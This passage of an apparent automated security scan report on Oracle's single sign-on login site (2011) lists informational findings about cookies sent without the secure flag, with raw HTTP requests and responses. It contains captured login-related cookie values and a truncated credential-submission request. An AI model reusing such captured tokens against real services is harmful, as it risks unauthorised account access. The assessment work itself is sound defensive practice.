gHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:14 GMT Accept-Ranges: bytes Content-Length: 7352 Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBOd6uHK6EVADUS1EHWFB01t_bJ X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ <!-- //global js var var isNav; // on load, run this function doLoad() { MM_reloadPage(true); isNav = (navigator.appName.indexOf("Netscape") !=-1); //register event listeners...[SNIP]...
7.31. https://login.oracle.com/mysso/sso_loginui/t-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-bg.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/t-bg.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:16 GMT Accept-Ranges: bytes Content-Length: 271 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXBom6uHK6EVADUS1EHWFB01t_cA X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/ GIF89a..2..................................................................................................................................................................................................[SNIP]...
7.32. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-l-corner.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/t-l-corner.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:18 GMT Accept-Ranges: bytes Content-Length: 1005 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCSO6uHK6EVADUS1EHWFB01t_dD X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/ GIF89a..2..................................................................................................................................................................................................[SNIP]...
7.33. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/t-r-corner.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/t-r-corner.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:19 GMT Accept-Ranges: bytes Content-Length: 1021 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCXC6uHK6EVADUS1EHWFB01t_dP X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ GIF89a..2..................................................................................................................................................................................................[SNIP]...
7.34. https://login.oracle.com/oam/server/sso/auth_cred_submit
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/oam/server/sso/auth_cred_submit
Issue detail
The following cookies were issued by the application and do not have the secure flag set:OAM_REQ=VERSION_4~8sDFSRHdibovgCmaA9kyeOsOvdSrurh9%2fYsDnUk2jlujlceQtRW%2fQNi%2flXtkj%2f1SgeTckB5GdKb4Hiz%2bcaNwewyERD7QcMRgfrRpVp90TY8%2bnYtDCyQML4cbcIJSBTocN%2bEcyowHjAV4T8IiI3ws7mDtrHQycjFS%2b95QII460g3qoNhW5NtfCCWtvEZPMmVBwHPgvUl5YR43OwJgq%2bgde0LQEam8lbD94jp4S6QIQXKKWPHI0shq11UCzQp5aTviul4GjqyWIuFn07nRX3c7G%2b8HAXNSYggrFqjg7N9UUmqwIfpGSKgxVQm2tlsyhx2lF5%2fX0znmI0CGPxx4YQVTl%2bytRrRVXkWsJKWAVC2FzkHt20rPSUn7Rzo%2bMTr39tUdbEwX6W8hNO2IrkJvXMMcG4bTMjA%2flK%2f4eDDKQ%2br%2f1adGjvQ2WW%2bXBGu1QE7ISAHAcp%2bIbTzC3qDrRlaOZfhk97Y08zoNSgWTBsG12KJsu03sFdYO857KTadQANWaeWqdu2Q2BUUGt%2fbNAg%2fENILYpeVU4d86XheiVhTMYekWWDmFlAWs0DYAM%2fCQK2ZXKVW7YTNKyMvHX1HQ2l4F5f%2bD6JGo%2f4Ry2rQnRq7GyVJ%2bzJQtF6jmJoT%2bzGRiv%2fNNNbbC31fjTRiLatV9yBVhBxppHWhW6bCA6QYsp5V74BcWmdtWQhbfiEnKZ3UmOb%2fCy1sG%2frCk%2fnPRs3cvRcBogNG7wow5PNoRfPVOUWXc7usXNYWVgHDEX%2fHWsui%2f4QTdBvYq%2ft2HetL6iIJD9WZ8jNh%2blmJa3smPgzYT9gacAilyIHHONowOlZ%2bcURiBuvAb7MvZxw9FgzeFFRCTo6x2xnhWElY4HbK7QFkICQ30JqYfGsrCQ8MDGbZGiAbZ46PvOXPiieaTuZc5UIc1bCKdSV1jOhoXiKS%2bwpAoSfC%2fe85ishtCItS6D9QwAU%2b6loe3DgvK4n71PHvaEEvoDHmJRu7cBud9m6v1ZVrhfxyTRXFlYRFNNuqkYAUxr7%2btX%2beHeWSxzLnrsRku1QxjbO9KosKHSaLFViJbMvbUqdCJO47kYlWlO1yUUjPaovy7hybBAbZv2lIBBYVBFi9AkrWVySFrl%2blnuYi%2f7VefR27D8%2fNlHuzS3d0uQp54NDsb3w0CM2d0ZEgF261aZjlrZDv7QPzW5%2fjv47uJUdUyzIIsrD%2fpO4WqefIJZkNbDUIiN4%2fU3MdciWfJk9ZyPeIuj4Z4SIQnGof8Zqf5FpE7YLidXdna2kuPrj9%2bWvOIEl0O6xE87fUHG83cMhqWltQTxdLcr7vm0KmM5n%2bc76Z0YYdmjqH48rlxK5HgZx%2bcLO0qjpOhfgGYsm%2blpKve%2bwUGhiGwuhvSfrI1RCpOeYzZT4Ow%2b7u5rIP2Z9n8CFs7YylZLN1thygm8RmyQw5PuTblocl9AFFvgH3MExec2L3WC0ymRApmsstEbF2Y%2bmnBtTbxMot3ZXMcfN9Aruj3T%2b%2b7D8u2Zv%2ffBdVt5qG3QItonF3FaFRiJ9QfIkvCT2vlYPQbI8jrJ5lqWqqYuyTS6DQdIJsSun1bXFZwksK9WdxHJGkOzAs3tM46h%2bhk9GQBqLceWigyZCuwHPI%2bHUUAq3a3j3jKLvi6eS5ZWrCxGXLqnsFSGQUWP7fElxGN35xwbvqMqetKjqX5VPTvDM4DINi0R1eoL5Xy8JofGj%2f1iEBuChkCDaSwb6sU%2b3ozVy4teWDpKd2ingo72r3r%2fM0rCvbbRfGlsN91sA%3d%3d; path=/; HttpOnly BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:16:28 GMT; path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
POST /oam/server/sso/auth_cred_submit HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp Content-Length: 2316 Cache-Control: max-age=0 Origin: https://login.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_pers=%20s_nr%3D1315343775191%7C1317935775191%3B%20gpv_p24%3Dno%2520value%7C1315345575196%3B%20gpw_e24%3Dno%2520value%7C1315345575201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleotnlive%253D%252526pid%25253Dotn%2525253Aen-us%2525253A%2525252Fcommunity%2525252Fdeveloper-vm%2525252F%252526pidt%25253D1%252526oid%25253Dotn%2525253Aen%2525253Ahnav%2525253Astore%2525253Astoredatabase%2525253Astoredatabaseseeall%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; s_nr=1315343778351; gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNtGu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000 v=v1.4&request_id=-1117423317593169810&OAM_REQ=VERSION_4%7EJ%252bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%252bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQ...[SNIP]...
Response
